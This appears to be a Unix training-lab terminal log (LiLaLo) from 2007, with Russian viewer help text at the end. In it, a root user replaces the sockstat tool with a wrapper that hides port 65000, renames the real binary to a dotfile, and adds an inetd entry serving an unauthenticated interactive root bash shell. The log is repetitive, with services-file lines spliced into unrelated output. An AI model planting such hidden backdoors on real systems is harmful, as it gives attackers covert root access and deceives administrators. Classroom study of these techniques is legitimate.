12:53:28
|
#cp /usr/bin/sockstat{,.orig}
|
| /l3/users/11-06-2007/nt-bsdnet/fbsd2.net.nt/root :1 :2 :3 :4 :5 :6 :7 :8 :9 :10 :11 :12 :13 :14 :15 :16 :17 :18 |
|
|
#cp /usr/bin/sockstat .
561 scoi2odialog 360/udp
562 semantix 361/tcp
563 semantix 361/udp
564 srssend 362/tcp #SRS Send
565 srssend 362/udp #SRS Send
566 rsvp_tunnel 363/tcp
567 rsvp_tunnel 363/udp
568 aurora-cmgr 364/tcp
569 aurora-cmgr 364/udp
570 dtk 365/tcp #Deception Tool Kit - Fred Cohen <fc@all.net>
571 dtk 365/udp #Deception Tool Kit - Fred Cohen <fc@all.net>
|
|
#cp /usr/bin/sockstat{,.orig}
|
|
#cp /usr/bin/sockstat{,.orig}
|
|
#ls -l /usr/bin/sockstat*
563 semantix 361/udp
564 srssend 362/tcp #SRS Send
565 srssend 362/udp #SRS Send
566 rsvp_tunnel 363/tcp
567 rsvp_tunnel 363/udp
568 aurora-cmgr 364/tcp
569 aurora-cmgr 364/udp
570 dtk 365/tcp #Deception Tool Kit - Fred Cohen <fc@all.net>
571 dtk 365/udp #Deception Tool Kit - Fred Cohen <fc@all.net>
-r-xr-xr-x 1 root wheel 9696 16 ÎÏÑ 2006 /usr/bin/sockstat
-r-xr-xr-x 1 root wheel 9696 12 ÉÀÎ 12:54 /usr/bin/sockstat.orig
|
|
#ls -l /usr/bin/sockstat*
563 semantix 361/udp
564 srssend 362/tcp #SRS Send
565 srssend 362/udp #SRS Send
566 rsvp_tunnel 363/tcp
567 rsvp_tunnel 363/udp
568 aurora-cmgr 364/tcp
569 aurora-cmgr 364/udp
570 dtk 365/tcp #Deception Tool Kit - Fred Cohen <fc@all.net>
571 dtk 365/udp #Deception Tool Kit - Fred Cohen <fc@all.net>
-r-xr-xr-x 1 root wheel 9696 16 ÎÏÑ 2006 /usr/bin/sockstat
-r-xr-xr-x 1 root wheel 9696 12 ÉÀÎ 12:54 /usr/bin/sockstat.orig
|
|
#LANG=C
|
|
#LANG=C
|
|
#ls -l /usr/bin/sockstat*
-r-xr-xr-x 1 root wheel 9696 Nov 16 2006 /usr/bin/sockstat -r-xr-xr-x 1 root wheel 9696 Jun 12 12:54 /usr/bin/sockstat.orig |
|
#ls -l /usr/bin/sockstat*
-r-xr-xr-x 1 root wheel 9696 Nov 16 2006 /usr/bin/sockstat -r-xr-xr-x 1 root wheel 9696 Jun 12 12:54 /usr/bin/sockstat.orig |
|
#vim /usr/bin/sockstat
|
|
#vim /usr/bin/sockstat
|
|
#rm /usr/bin/sockstat
|
|
#rm /usr/bin/sockstat
|
|
#vim /usr/bin/sockstat
|
|
#vim /usr/bin/sockstat
|
|
#chmod a+x /usr/bin/sockstat
|
|
#chmod a+x /usr/bin/sockstat
|
|
#sockstat -4l
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS root sendmail 709 3 tcp4 127.0.0.1:25 *:* root sshd 703 4 tcp4 *:22 *:* root syslogd 525 7 udp4 *:514 *:* |
|
#sockstat -4l
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS root sendmail 709 3 tcp4 127.0.0.1:25 *:* root sshd 703 4 tcp4 *:22 *:* root syslogd 525 7 udp4 *:514 *:* |
|
#vim /usr/bin/sockstat
1c1 < /usr/bin/sockstat.orig "$@" | egrep -v ':(65000|calc)' --- > /usr/bin/.sockstat.orig "$@" | egrep -v ':(65000|calc)' |
|
#vim /usr/bin/sockstat
1c1 < /usr/bin/sockstat.orig "$@" | egrep -v ':(65000|calc)' --- > /usr/bin/.sockstat.orig "$@" | egrep -v ':(65000|calc)' |
|
#mv /usr/bin/sockstat.orig /usr/bin/.sockstat.orig
|
|
#mv /usr/bin/sockstat.orig /usr/bin/.sockstat.orig
|
|
#sockstat -4l
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS root sendmail 709 3 tcp4 127.0.0.1:25 *:* root sshd 703 4 tcp4 *:22 *:* root syslogd 525 7 udp4 *:514 *:* |
|
#sockstat -4l
USER COMMAND PID FD PROTO LOCAL ADDRESS FOREIGN ADDRESS root sendmail 709 3 tcp4 127.0.0.1:25 *:* root sshd 703 4 tcp4 *:22 *:* root syslogd 525 7 udp4 *:514 *:* |
|
#cat /usr/bin/sockstat
/usr/bin/.sockstat.orig "$@" | egrep -v ':(65000|calc)' |
|
#cat /usr/bin/sockstat
/usr/bin/.sockstat.orig "$@" | egrep -v ':(65000|calc)' |
|
#vim /etc/services
|
|
#vim /etc/services
|
|
#vim /etc/inetd.conf
|
|
#vim /etc/inetd.conf
|
|
#man bash
|
|
#man bash
|
|
#vim /etc/inetd.conf
128c128 < bash stream tcp nowait root /usr/libexec/tcpd /usr/local/bin/bash --- > bash stream tcp nowait root /usr/libexec/tcpd /usr/local/bin/bash -i |
|
#vim /etc/inetd.conf
128c128 < bash stream tcp nowait root /usr/libexec/tcpd /usr/local/bin/bash --- > bash stream tcp nowait root /usr/libexec/tcpd /usr/local/bin/bash -i |
|
#pkill -1 inetd
|
|
#pkill -1 inetd
|
|
#telnet 192.168.16.22 65001
Trying 192.168.16.22... Connected to fbsd2.net.nt. Escape character is '^]'. |
|
#telnet 192.168.16.22 65001
Trying 192.168.16.22... Connected to fbsd2.net.nt. Escape character is '^]'. |
|
#exit
Connection closed by foreign host. |
|
#exit
Connection closed by foreign host. |
|
#telnet 192.168.16.22 65001
Trying 192.168.16.22... Connected to fbsd2.net.nt. Escape character is '^]'. |
|
#telnet 192.168.16.22 65001
Trying 192.168.16.22... Connected to fbsd2.net.nt. Escape character is '^]'. |
|
#ls
ls .cshrc boot etc proc usr .mozilla cdrom home rescue var .profile compat lib root .snap dev libexec sbin COPYRIGHT dist media sys bin entropy mnt tmp |
|
#ls
ls .cshrc boot etc proc usr .mozilla cdrom home rescue var .profile compat lib root .snap dev libexec sbin COPYRIGHT dist media sys bin entropy mnt tmp |
|
#ls
.cshrc boot etc proc usr .mozilla cdrom home rescue var .profile compat lib root .snap dev libexec sbin COPYRIGHT dist media sys bin entropy mnt tmp |
|
#ls
.cshrc boot etc proc usr .mozilla cdrom home rescue var .profile compat lib root .snap dev libexec sbin COPYRIGHT dist media sys bin entropy mnt tmp |
|
#ls -l
ls -l total 57 -rw-r--r-- 2 root wheel 801 16 ÎÏÑ 2006 .cshrc drwx------ 2 root wheel 512 8 ÉÀÎ 20:59 .mozilla -rw-r--r-- 2 root wheel 251 16 ÎÏÑ 2006 .profile drwxrwxr-x 2 root operator 512 8 ÉÀÎ 20:10 .snap -r--r--r-- 1 root wheel 6187 16 ÎÏÑ 2006 COPYRIGHT drwxr-xr-x 2 root wheel 1024 8 ÉÀÎ 20:11 bin drwxr-xr-x 7 root wheel 512 12 ÉÀÎ 03:05 boot drwxr-xr-x 2 root wheel 512 8 ÉÀÎ 20:10 cdrom ... drwxr-xr-x 2 root wheel 512 16 ÎÏÑ 2006 media drwxr-xr-x 2 root wheel 512 16 ÎÏÑ 2006 mnt dr-xr-xr-x 2 root wheel 512 16 ÎÏÑ 2006 proc drwxr-xr-x 2 root wheel 2560 8 ÉÀÎ 20:11 rescue drwxr-xr-x 7 root wheel 512 12 ÉÀÎ 12:59 root drwxr-xr-x 2 root wheel 2560 8 ÉÀÎ 20:11 sbin lrwxrwxrwx 1 root wheel 11 8 ÉÀÎ 20:10 sys -> usr/src/sys drwxrwxrwt 15 root wheel 512 12 ÉÀÎ 12:59 tmp drwxr-xr-x 18 root wheel 512 8 ÉÀÎ 21:25 usr drwxr-xr-x 24 root wheel 512 12 ÉÀÎ 15:17 var |
|
#ls -l
ls -l total 57 -rw-r--r-- 2 root wheel 801 16 ÎÏÑ 2006 .cshrc drwx------ 2 root wheel 512 8 ÉÀÎ 20:59 .mozilla -rw-r--r-- 2 root wheel 251 16 ÎÏÑ 2006 .profile drwxrwxr-x 2 root operator 512 8 ÉÀÎ 20:10 .snap -r--r--r-- 1 root wheel 6187 16 ÎÏÑ 2006 COPYRIGHT drwxr-xr-x 2 root wheel 1024 8 ÉÀÎ 20:11 bin drwxr-xr-x 7 root wheel 512 12 ÉÀÎ 03:05 boot drwxr-xr-x 2 root wheel 512 8 ÉÀÎ 20:10 cdrom ... drwxr-xr-x 2 root wheel 512 16 ÎÏÑ 2006 media drwxr-xr-x 2 root wheel 512 16 ÎÏÑ 2006 mnt dr-xr-xr-x 2 root wheel 512 16 ÎÏÑ 2006 proc drwxr-xr-x 2 root wheel 2560 8 ÉÀÎ 20:11 rescue drwxr-xr-x 7 root wheel 512 12 ÉÀÎ 12:59 root drwxr-xr-x 2 root wheel 2560 8 ÉÀÎ 20:11 sbin lrwxrwxrwx 1 root wheel 11 8 ÉÀÎ 20:10 sys -> usr/src/sys drwxrwxrwt 15 root wheel 512 12 ÉÀÎ 12:59 tmp drwxr-xr-x 18 root wheel 512 8 ÉÀÎ 21:25 usr drwxr-xr-x 24 root wheel 512 12 ÉÀÎ 15:17 var |
|
#ls -l
total 57 -rw-r--r-- 2 root wheel 801 16 ÎÏÑ 2006 .cshrc drwx------ 2 root wheel 512 8 ÉÀÎ 20:59 .mozilla -rw-r--r-- 2 root wheel 251 16 ÎÏÑ 2006 .profile drwxrwxr-x 2 root operator 512 8 ÉÀÎ 20:10 .snap -r--r--r-- 1 root wheel 6187 16 ÎÏÑ 2006 COPYRIGHT drwxr-xr-x 2 root wheel 1024 8 ÉÀÎ 20:11 bin drwxr-xr-x 7 root wheel 512 12 ÉÀÎ 03:05 boot drwxr-xr-x 2 root wheel 512 8 ÉÀÎ 20:10 cdrom lrwxr-xr-x 1 root wheel 10 8 ÉÀÎ 20:20 compat -> usr/compat ... drwxr-xr-x 2 root wheel 512 16 ÎÏÑ 2006 media drwxr-xr-x 2 root wheel 512 16 ÎÏÑ 2006 mnt dr-xr-xr-x 2 root wheel 512 16 ÎÏÑ 2006 proc drwxr-xr-x 2 root wheel 2560 8 ÉÀÎ 20:11 rescue drwxr-xr-x 7 root wheel 512 12 ÉÀÎ 12:59 root drwxr-xr-x 2 root wheel 2560 8 ÉÀÎ 20:11 sbin lrwxrwxrwx 1 root wheel 11 8 ÉÀÎ 20:10 sys -> usr/src/sys drwxrwxrwt 15 root wheel 512 12 ÉÀÎ 12:59 tmp drwxr-xr-x 18 root wheel 512 8 ÉÀÎ 21:25 usr drwxr-xr-x 24 root wheel 512 12 ÉÀÎ 15:17 var |
|
#ls -l
total 57 -rw-r--r-- 2 root wheel 801 16 ÎÏÑ 2006 .cshrc drwx------ 2 root wheel 512 8 ÉÀÎ 20:59 .mozilla -rw-r--r-- 2 root wheel 251 16 ÎÏÑ 2006 .profile drwxrwxr-x 2 root operator 512 8 ÉÀÎ 20:10 .snap -r--r--r-- 1 root wheel 6187 16 ÎÏÑ 2006 COPYRIGHT drwxr-xr-x 2 root wheel 1024 8 ÉÀÎ 20:11 bin drwxr-xr-x 7 root wheel 512 12 ÉÀÎ 03:05 boot drwxr-xr-x 2 root wheel 512 8 ÉÀÎ 20:10 cdrom lrwxr-xr-x 1 root wheel 10 8 ÉÀÎ 20:20 compat -> usr/compat ... drwxr-xr-x 2 root wheel 512 16 ÎÏÑ 2006 media drwxr-xr-x 2 root wheel 512 16 ÎÏÑ 2006 mnt dr-xr-xr-x 2 root wheel 512 16 ÎÏÑ 2006 proc drwxr-xr-x 2 root wheel 2560 8 ÉÀÎ 20:11 rescue drwxr-xr-x 7 root wheel 512 12 ÉÀÎ 12:59 root drwxr-xr-x 2 root wheel 2560 8 ÉÀÎ 20:11 sbin lrwxrwxrwx 1 root wheel 11 8 ÉÀÎ 20:10 sys -> usr/src/sys drwxrwxrwt 15 root wheel 512 12 ÉÀÎ 12:59 tmp drwxr-xr-x 18 root wheel 512 8 ÉÀÎ 21:25 usr drwxr-xr-x 24 root wheel 512 12 ÉÀÎ 15:17 var |
|
#LANG=C
|
|
#exit
Connection closed by foreign host. |
|
#exit
Connection closed by foreign host. |
|
#ssh clint@net.nt
Connection to net.nt closed. |
|
#ssh clint@net.nt
Connection to net.nt closed. |
|
#]
bash: ]: command not found |
|
#]
bash: ]: command not found |
|
#cd /usr/home/user/
|
|
#cd /usr/home/user/
|
|
#cd /usr/home/user/
|
|
#ll
bash: ll: command not found |
|
#ll
bash: ll: command not found |
|
#ll
bash: ll: command not found |
|
#ls
.ICEauthority .gnome2 .mcop .bash_history .gnome2_private .mcoprc .bash_profile .gstreamer-0.10 .metacity .bashrc .gtkrc-1.2-gnome2 .mozilla .cshrc .kde .nautilus .dmrc .l3rc .profile .fonts .lilalo .qt .fonts.cache-1 .login .rhosts .gconf .login_conf .shrc .gconfd .mail_aliases .xsession-errors .gnome .mailrc Desktop |
|
#ls
.ICEauthority .gnome2 .mcop .bash_history .gnome2_private .mcoprc .bash_profile .gstreamer-0.10 .metacity .bashrc .gtkrc-1.2-gnome2 .mozilla .cshrc .kde .nautilus .dmrc .l3rc .profile .fonts .lilalo .qt .fonts.cache-1 .login .rhosts .gconf .login_conf .shrc .gconfd .mail_aliases .xsession-errors .gnome .mailrc Desktop |
|
#ls
.ICEauthority .gnome2 .mcop .bash_history .gnome2_private .mcoprc .bash_profile .gstreamer-0.10 .metacity .bashrc .gtkrc-1.2-gnome2 .mozilla .cshrc .kde .nautilus .dmrc .l3rc .profile .fonts .lilalo .qt .fonts.cache-1 .login .rhosts .gconf .login_conf .shrc .gconfd .mail_aliases .xsession-errors .gnome .mailrc Desktop |
|
#ls -la
total 218 drwxr-xr-x 17 user wheel 1024 Jun 11 09:32 . drwxr-xr-x 4 root wheel 512 Jun 11 11:00 .. -rw------- 1 user wheel 169 Jun 8 18:40 .ICEauthority -rw------- 1 user wheel 24 Jun 11 09:33 .bash_history -rw-r--r-- 1 user wheel 10 Jun 11 09:32 .bash_profile -rw-r--r-- 1 user wheel 43 Jun 11 09:32 .bashrc -rw-r--r-- 1 user wheel 767 Jun 8 21:25 .cshrc -rw------- 1 user wheel 45 Jun 8 18:32 .dmrc drwxr-xr-x 2 user wheel 512 Jun 8 18:34 .fonts ... -rw------- 1 user wheel 31 Jun 8 18:35 .mcoprc drwx------ 3 user wheel 512 Jun 8 18:33 .metacity drwx------ 3 user wheel 512 Jun 8 18:40 .mozilla drwxr-xr-x 3 user wheel 512 Jun 8 18:33 .nautilus -rw-r--r-- 1 user wheel 797 Jun 8 21:25 .profile drwxr-xr-x 2 user wheel 512 Jun 8 18:33 .qt -rw------- 1 user wheel 276 Jun 8 21:25 .rhosts -rw-r--r-- 1 user wheel 975 Jun 8 21:25 .shrc -rw-r--r-- 1 user wheel 2125 Jun 8 18:39 .xsession-errors drwxr-xr-x 2 user wheel 512 Jun 8 18:33 Desktop |
|
#ls -la
total 218 drwxr-xr-x 17 user wheel 1024 Jun 11 09:32 . drwxr-xr-x 4 root wheel 512 Jun 11 11:00 .. -rw------- 1 user wheel 169 Jun 8 18:40 .ICEauthority -rw------- 1 user wheel 24 Jun 11 09:33 .bash_history -rw-r--r-- 1 user wheel 10 Jun 11 09:32 .bash_profile -rw-r--r-- 1 user wheel 43 Jun 11 09:32 .bashrc -rw-r--r-- 1 user wheel 767 Jun 8 21:25 .cshrc -rw------- 1 user wheel 45 Jun 8 18:32 .dmrc drwxr-xr-x 2 user wheel 512 Jun 8 18:34 .fonts ... -rw------- 1 user wheel 31 Jun 8 18:35 .mcoprc drwx------ 3 user wheel 512 Jun 8 18:33 .metacity drwx------ 3 user wheel 512 Jun 8 18:40 .mozilla drwxr-xr-x 3 user wheel 512 Jun 8 18:33 .nautilus -rw-r--r-- 1 user wheel 797 Jun 8 21:25 .profile drwxr-xr-x 2 user wheel 512 Jun 8 18:33 .qt -rw------- 1 user wheel 276 Jun 8 21:25 .rhosts -rw-r--r-- 1 user wheel 975 Jun 8 21:25 .shrc -rw-r--r-- 1 user wheel 2125 Jun 8 18:39 .xsession-errors drwxr-xr-x 2 user wheel 512 Jun 8 18:33 Desktop |
|
#ls -la
total 218 drwxr-xr-x 17 user wheel 1024 Jun 11 09:32 . drwxr-xr-x 4 root wheel 512 Jun 11 11:00 .. -rw------- 1 user wheel 169 Jun 8 18:40 .ICEauthority -rw------- 1 user wheel 24 Jun 11 09:33 .bash_history -rw-r--r-- 1 user wheel 10 Jun 11 09:32 .bash_profile -rw-r--r-- 1 user wheel 43 Jun 11 09:32 .bashrc -rw-r--r-- 1 user wheel 767 Jun 8 21:25 .cshrc -rw------- 1 user wheel 45 Jun 8 18:32 .dmrc drwxr-xr-x 2 user wheel 512 Jun 8 18:34 .fonts ... -rw------- 1 user wheel 31 Jun 8 18:35 .mcoprc drwx------ 3 user wheel 512 Jun 8 18:33 .metacity drwx------ 3 user wheel 512 Jun 8 18:40 .mozilla drwxr-xr-x 3 user wheel 512 Jun 8 18:33 .nautilus -rw-r--r-- 1 user wheel 797 Jun 8 21:25 .profile drwxr-xr-x 2 user wheel 512 Jun 8 18:33 .qt -rw------- 1 user wheel 276 Jun 8 21:25 .rhosts -rw-r--r-- 1 user wheel 975 Jun 8 21:25 .shrc -rw-r--r-- 1 user wheel 2125 Jun 8 18:39 .xsession-errors drwxr-xr-x 2 user wheel 512 Jun 8 18:33 Desktop |
|
#ls -la
561 scoi2odialog 360/udp
562 semantix 361/tcp
563 semantix 361/udp
564 srssend 362/tcp #SRS Send
565 srssend 362/udp #SRS Send
566 rsvp_tunnel 363/tcp
567 rsvp_tunnel 363/udp
568 aurora-cmgr 364/tcp
569 aurora-cmgr 364/udp
570 dtk 365/tcp #Deception Tool Kit - Fred Cohen <fc@all.net>
571 dtk 365/udp #Deception Tool Kit - Fred Cohen <fc@all.net>
|
|
#ls -la
561 scoi2odialog 360/udp
562 semantix 361/tcp
563 semantix 361/udp
564 srssend 362/tcp #SRS Send
565 srssend 362/udp #SRS Send
566 rsvp_tunnel 363/tcp
567 rsvp_tunnel 363/udp
568 aurora-cmgr 364/tcp
569 aurora-cmgr 364/udp
570 dtk 365/tcp #Deception Tool Kit - Fred Cohen <fc@all.net>
571 dtk 365/udp #Deception Tool Kit - Fred Cohen <fc@all.net>
|
|
#vim .login
|
|
#vim .login
|
|
#vim .login
|
|
#data
562 semantix 361/tcp
563 semantix 361/udp
564 srssend 362/tcp #SRS Send
565 srssend 362/udp #SRS Send
566 rsvp_tunnel 363/tcp
567 rsvp_tunnel 363/udp
568 aurora-cmgr 364/tcp
569 aurora-cmgr 364/udp
570 dtk 365/tcp #Deception Tool Kit - Fred Cohen <fc@all.net>
571 dtk 365/udp #Deception Tool Kit - Fred Cohen <fc@all.net>
bash: data: command not found
|
|
#data
562 semantix 361/tcp
563 semantix 361/udp
564 srssend 362/tcp #SRS Send
565 srssend 362/udp #SRS Send
566 rsvp_tunnel 363/tcp
567 rsvp_tunnel 363/udp
568 aurora-cmgr 364/tcp
569 aurora-cmgr 364/udp
570 dtk 365/tcp #Deception Tool Kit - Fred Cohen <fc@all.net>
571 dtk 365/udp #Deception Tool Kit - Fred Cohen <fc@all.net>
bash: data: command not found
|
|
#date
Tue Jun 12 13:35:26 EEST 2007 |
|
#date
Tue Jun 12 13:35:26 EEST 2007 |
|
#ntpd
562 semantix 361/tcp
563 semantix 361/udp
564 srssend 362/tcp #SRS Send
565 srssend 362/udp #SRS Send
566 rsvp_tunnel 363/tcp
567 rsvp_tunnel 363/udp
568 aurora-cmgr 364/tcp
569 aurora-cmgr 364/udp
570 dtk 365/tcp #Deception Tool Kit - Fred Cohen <fc@all.net>
571 dtk 365/udp #Deception Tool Kit - Fred Cohen <fc@all.net>
ntpd ntpdate ntpdc
|
|
#ntpd
ntpd ntpdate ntpdc |
|
#ntpdate ntp.psn.ru
12 Jun 13:36:46 ntpdate[2320]: step time server 194.149.67.130 offset 35.559095 sec |
|
#ntpd
562 semantix 361/tcp
563 semantix 361/udp
564 srssend 362/tcp #SRS Send
565 srssend 362/udp #SRS Send
566 rsvp_tunnel 363/tcp
567 rsvp_tunnel 363/udp
568 aurora-cmgr 364/tcp
569 aurora-cmgr 364/udp
570 dtk 365/tcp #Deception Tool Kit - Fred Cohen <fc@all.net>
571 dtk 365/udp #Deception Tool Kit - Fred Cohen <fc@all.net>
ntpd ntpdate ntpdc
|
|
#ntpd
ntpd ntpdate ntpdc |
|
#ntpdate ntp.psn.ru
12 Jun 13:36:46 ntpdate[2320]: step time server 194.149.67.130 offset 35.559095 sec |
|
#cd /usr/src/
561 scoi2odialog 360/udp
562 semantix 361/tcp
563 semantix 361/udp
564 srssend 362/tcp #SRS Send
565 srssend 362/udp #SRS Send
566 rsvp_tunnel 363/tcp
567 rsvp_tunnel 363/udp
568 aurora-cmgr 364/tcp
569 aurora-cmgr 364/udp
570 dtk 365/tcp #Deception Tool Kit - Fred Cohen <fc@all.net>
571 dtk 365/udp #Deception Tool Kit - Fred Cohen <fc@all.net>
|
|
#cd /usr/src/
561 scoi2odialog 360/udp
562 semantix 361/tcp
563 semantix 361/udp
564 srssend 362/tcp #SRS Send
565 srssend 362/udp #SRS Send
566 rsvp_tunnel 363/tcp
567 rsvp_tunnel 363/udp
568 aurora-cmgr 364/tcp
569 aurora-cmgr 364/udp
570 dtk 365/tcp #Deception Tool Kit - Fred Cohen <fc@all.net>
571 dtk 365/udp #Deception Tool Kit - Fred Cohen <fc@all.net>
|
|
#make search name=tzconfig
make: don't know how to make search. Stop |
|
#make search name=tzconfig
make: don't know how to make search. Stop |
|
#cd ../ports/
561 scoi2odialog 360/udp
562 semantix 361/tcp
563 semantix 361/udp
564 srssend 362/tcp #SRS Send
565 srssend 362/udp #SRS Send
566 rsvp_tunnel 363/tcp
567 rsvp_tunnel 363/udp
568 aurora-cmgr 364/tcp
569 aurora-cmgr 364/udp
570 dtk 365/tcp #Deception Tool Kit - Fred Cohen <fc@all.net>
571 dtk 365/udp #Deception Tool Kit - Fred Cohen <fc@all.net>
|
|
#cd ../ports/
561 scoi2odialog 360/udp
562 semantix 361/tcp
563 semantix 361/udp
564 srssend 362/tcp #SRS Send
565 srssend 362/udp #SRS Send
566 rsvp_tunnel 363/tcp
567 rsvp_tunnel 363/udp
568 aurora-cmgr 364/tcp
569 aurora-cmgr 364/udp
570 dtk 365/tcp #Deception Tool Kit - Fred Cohen <fc@all.net>
571 dtk 365/udp #Deception Tool Kit - Fred Cohen <fc@all.net>
|
|
#make search name=tzconfig
|
|
#make search name=tzconfig
|
|
#make search name=tzwatch
|
|
#make search name=tzwatch
|
|
#apropos time | grep zone
adjkerntz(8) - adjust local time CMOS clock to reflect time zone changes and keep current timezone offset for the kernel timezone(3) - return the timezone abbreviation tzfile(5) - timezone information tzsetup(8) - set local timezone zdump(8) - timezone dumper zic(8) - timezone compiler |
|
#apropos time | grep zone
adjkerntz(8) - adjust local time CMOS clock to reflect time zone changes and keep current timezone offset for the kernel timezone(3) - return the timezone abbreviation tzfile(5) - timezone information tzsetup(8) - set local timezone zdump(8) - timezone dumper zic(8) - timezone compiler |
|
#man tzfile
|
/usr/bin/.sockstat.orig "$@" | egrep -v ':(65000|calc)'
| Время первой команды журнала | 12:53:23 2007- 6-12 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Время последней команды журнала | 13:38:24 2007- 6-12 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Количество командных строк в журнале | 101 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Процент команд с ненулевым кодом завершения, % | 9.90 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Процент синтаксически неверно набранных команд, % | 6.93 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Суммарное время работы с терминалом *, час | 0.75 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Количество командных строк в единицу времени, команда/мин | 2.24 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
| Частота использования команд |
|
В журнал автоматически попадают все команды, данные в любом терминале системы.
Для того чтобы убедиться, что журнал на текущем терминале ведётся, и команды записываются, дайте команду w. В поле WHAT, соответствующем текущему терминалу, должна быть указана программа script.
Команды, при наборе которых были допущены синтаксические ошибки, выводятся перечёркнутым текстом:
$ l s-l bash: l: command not found |
Если код завершения команды равен нулю, команда была выполнена без ошибок. Команды, код завершения которых отличен от нуля, выделяются цветом.
$ test 5 -lt 4 |
Команды, ход выполнения которых был прерван пользователем, выделяются цветом.
$ find / -name abc find: /home/devi-orig/.gnome2: Keine Berechtigung find: /home/devi-orig/.gnome2_private: Keine Berechtigung find: /home/devi-orig/.nautilus/metafiles: Keine Berechtigung find: /home/devi-orig/.metacity: Keine Berechtigung find: /home/devi-orig/.inkscape: Keine Berechtigung ^C |
Команды, выполненные с привилегиями суперпользователя, выделяются слева красной чертой.
# id uid=0(root) gid=0(root) Gruppen=0(root) |
Изменения, внесённые в текстовый файл с помощью редактора, запоминаются и показываются в журнале в формате ed. Строки, начинающиеся символом "<", удалены, а строки, начинающиеся символом ">" -- добавлены.
$ vi ~/.bashrc
|
Для того чтобы изменить файл в соответствии с показанными в диффшоте изменениями, можно воспользоваться командой patch. Нужно скопировать изменения, запустить программу patch, указав в качестве её аргумента файл, к которому применяются изменения, и всавить скопированный текст:
$ patch ~/.bashrc |
Для того чтобы получить краткую справочную информацию о команде, нужно подвести к ней мышь. Во всплывающей подсказке появится краткое описание команды.
Если справочная информация о команде есть, команда выделяется голубым фоном, например: vi. Если справочная информация отсутствует, команда выделяется розовым фоном, например: notepad.exe. Справочная информация может отсутствовать в том случае, если (1) команда введена неверно; (2) если распознавание команды LiLaLo выполнено неверно; (3) если информация о команде неизвестна LiLaLo. Последнее возможно для редких команд.
Большие, в особенности многострочные, всплывающие подсказки лучше всего показываются браузерами KDE Konqueror, Apple Safari и Microsoft Internet Explorer. В браузерах Mozilla и Firefox они отображаются не полностью, а вместо перевода строки выводится специальный символ.
Время ввода команды, показанное в журнале, соответствует времени начала ввода командной строки, которое равно тому моменту, когда на терминале появилось приглашение интерпретатора
Имя терминала, на котором была введена команда, показано в специальном блоке. Этот блок показывается только в том случае, если терминал текущей команды отличается от терминала предыдущей.
Вывод не интересующих вас в настоящий момент элементов журнала, таких как время, имя терминала и других, можно отключить. Для этого нужно воспользоваться формой управления журналом вверху страницы.
Небольшие комментарии к командам можно вставлять прямо из командной строки. Комментарий вводится прямо в командную строку, после символов #^ или #v. Символы ^ и v показывают направление выбора команды, к которой относится комментарий: ^ - к предыдущей, v - к следующей. Например, если в командной строке было введено:
$ whoami
user
$ #^ Интересно, кто я?в журнале это будет выглядеть так:
$ whoami
user
| Интересно, кто я? |
Если комментарий содержит несколько строк, его можно вставить в журнал следующим образом:
$ whoami
user
$ cat > /dev/null #^ Интересно, кто я?
Программа whoami выводит имя пользователя, под которым мы зарегистрировались в системе. - Она не может ответить на вопрос о нашем назначении в этом мире.В журнале это будет выглядеть так:
$ whoami user
|
Комментарии, не относящиеся непосредственно ни к какой из команд, добавляются точно таким же способом, только вместо симолов #^ или #v нужно использовать символы #=
1
2
3
4
Группы команд, выполненных на разных терминалах, разделяются специальной линией.
Под этой линией в правом углу показано имя терминала, на котором выполнялись команды.
Для того чтобы посмотреть команды только одного сенса,
нужно щёкнуть по этому названию.
LiLaLo (L3) расшифровывается как Live Lab Log.
Программа разработана для повышения эффективности обучения Unix/Linux-системам.
(c) Игорь Чубин, 2004-2008